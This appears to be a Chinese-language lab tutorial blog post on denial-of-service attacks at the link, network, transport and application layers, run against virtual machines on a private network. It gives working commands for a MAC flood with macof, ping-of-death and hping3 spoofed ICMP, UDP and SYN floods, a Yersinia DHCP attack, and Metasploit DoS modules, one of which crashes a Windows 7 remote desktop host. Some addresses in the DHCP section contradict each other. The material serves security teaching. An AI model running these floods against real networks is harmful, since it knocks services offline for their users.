拒绝服务攻击


一.数据链路层的拒绝服务攻击

实验所涉及的主机:

  1. Kali Linux 2主机IP: 192.168.17.130
  2. eNSP中PC1的IP: 192.168.17.101
  3. eNSP中PC2的IP: 192.168.17.102

案例:攻击交换机

  • 原理:伪造大量的数据包(源MAC地址和目的MAC地址都是随机构造的)发送到交换机,很快将交换机CAM表填满,交换机退化为集线器。完成该任务的攻击工具为macof,它是dsniff工具集的成员,先安装再使用。

1、使用eNSP搭建实验环境

在eNSP中新建拓扑:

  1. PC1、PC2的IP地址必须与Kali Linux 2处于相同的网段.
  2. 通过iCloud作为Kali Linux 2 与eNSP中交换机之间的通道。

(1)iCloud的配置如下:

iCloud的配置

(2)搭建用于实验的拓扑图:

用于实验的拓扑图

(3)同网段的两台主机可以互相ping通

同网段的两台主机可以互相ping通

2、在Kali Linux 2更新系统并安装dsniff工具集

(1)先更新系统

apt update

(2)安装dsniff

apt-get install dsniff

在这里插入图片描述

3、在Kali Linux 2启动macof

伪造大量的数据包发送到交换机,很快将交换机CAM表填满,交换机退化为集线器。

(1)启动macof

macof

在这里插入图片描述

(2)查看交换机

命令:

display mac-address

在这里插入图片描述

二:网络层的拒绝服务攻击

实验所涉及的主机:

  1. Kali Linux 2主机IP: 192.168.17.130
  2. 32位windows 7的IP: 192.168.17.128

案例:攻击32位windows 7:

  • 做法:向目标主机不断发送“死亡之ping”(如65500字节的数据包),目标主机处理请求和应答,消耗目标主机的资源。由于现在的操作系统和CPU完全有能力处理65500这个数量级的数据包,效果不明显。

向目标主机发送大小为65500字节的数据包:

ping 192.168.17.128 -l 65500

在这里插入图片描述
在这里插入图片描述

必须进一步增加数据包的数量,有两种方法:

  • 一是使用多台主机发送ICMP数据包;二是提高发送ICMP数据包的速度。我们采用第二种方法----hping3是一款用于生成和解析TCP/IP数据包的开源工具,可以实现拒绝服务攻击。

1、启动hping3

命令:

hping3

在这里插入图片描述

2、查看hping3帮助信息

命令:

hping3 -h

在这里插入图片描述

3、显示当前hping3版本

命令:

hping3 -v

在这里插入图片描述

4、构造基于ICMP的拒绝服务攻击

注:-q 表示静默模式;–rand-source 表示伪造随机的源地址;–id 0 表示有ICMP应答请求;-d 56 表示数据包的大小;–flood 表示尽可能快地发送数据包。

命令:

hping3 -q --rand-source --id 0 --icmp -d 56 --flood 192.168.17.128

在这里插入图片描述

5、查看结果

短短几十秒就产生了几十万个数据包
在这里插入图片描述

三.传输层的拒绝服务攻击

1.前期准备

(1)实验所涉及的主机:

  1. Kali Linux 2主机IP:192.168.17.103
  2. windows 2003 server主机IP:192.168.1.254
  3. 32位windows 7的IP: 192.168.17.101
  4. windows XP的IP: 192.168.17.102

在这里插入图片描述
设置win2003的IP

(2)准备好DHCP服务器

提示:本节和下一节都要使用到DHCP服务器,先准备好DHCP服务器(IP为 192.168.1.254)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 传输层有UDP和TCP两个协议,传输层攻击目标是主机的某个端口。
  • 案例:攻击DHCP服务器,IP为192.168.140.254;192.168.140.131是欺骗源地址。

2.基于UDP协议的利用68端口(DHCP client服务端口)拒绝服务攻击

命令:

hping3 -q -n -a 192.168.1.101 --udp -s 53 --keep -p 68 --flood 192.168.1.254

在这里插入图片描述

  • 重新获取IP地址

在这里插入图片描述

3.基于TCP协议的SYN拒绝服务攻击

命令:

hping3 -q -n -a 192.168.1.101 --S -s 53 --keep -p 22 --flood 192.168.1.254

在这里插入图片描述

  • 重新获取IP地址

在这里插入图片描述

四.基于应用层的拒绝服务攻击

1.使用Yersinia工具

  • 案例:对应用层DHCP协议的攻击,DHCP服务器IP为192.168.1.254。

(1)安装yersinia工具

  • 安装前先将网卡切换回NAT模式

命令:

apt-get install yersinia

在这里插入图片描述

(2)启动yersinia工具

命令:

yersinia -G

在这里插入图片描述

(3) 选择攻击协议为DHCP

在这里插入图片描述

(4) 启动客户机测试

在这里插入图片描述

(5) 关闭Yersinia工作界面后重新获取

在这里插入图片描述
在这里插入图片描述

2.使用Metasploit

2-1.案例一:

攻击Web服务。搭建Web服务器,端口为80,IP为192.168.1.254。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(1)启动Metasploit框架。

命令:

msfconsole

在这里插入图片描述

(2)搜索与DoS(拒绝服务)相关的模块,并配置相关参数。
(2.1) 命令
search dos

在这里插入图片描述

(2.2) 载入模块命令
use auxiliary/dos/tcp/synflood
(2.3) 查看相关参数命令
show options
(2.4) 设置目标主机IP命令
set RHOSTS 192.168.1.254

在这里插入图片描述

(3)发动攻击

命令:

run

在这里插入图片描述

  • 访问默认浏览器

在这里插入图片描述

2-2.案例二:

  • 利用远程桌面协议的漏洞攻击。在Windows7上启动远程桌面,IP为192.168.17.101

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(1) 启动Metasploit框架
  • 命令:
msfconsole

在这里插入图片描述

(2) 搜索与DoS(拒绝服务)相关的模块,并配置相关参数。
  • 命令:
search dos

在这里插入图片描述
在这里插入图片描述

(3) 发动攻击

命令:

exploit

在这里插入图片描述

  • 发起攻击后出现蓝屏

在这里插入图片描述

  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值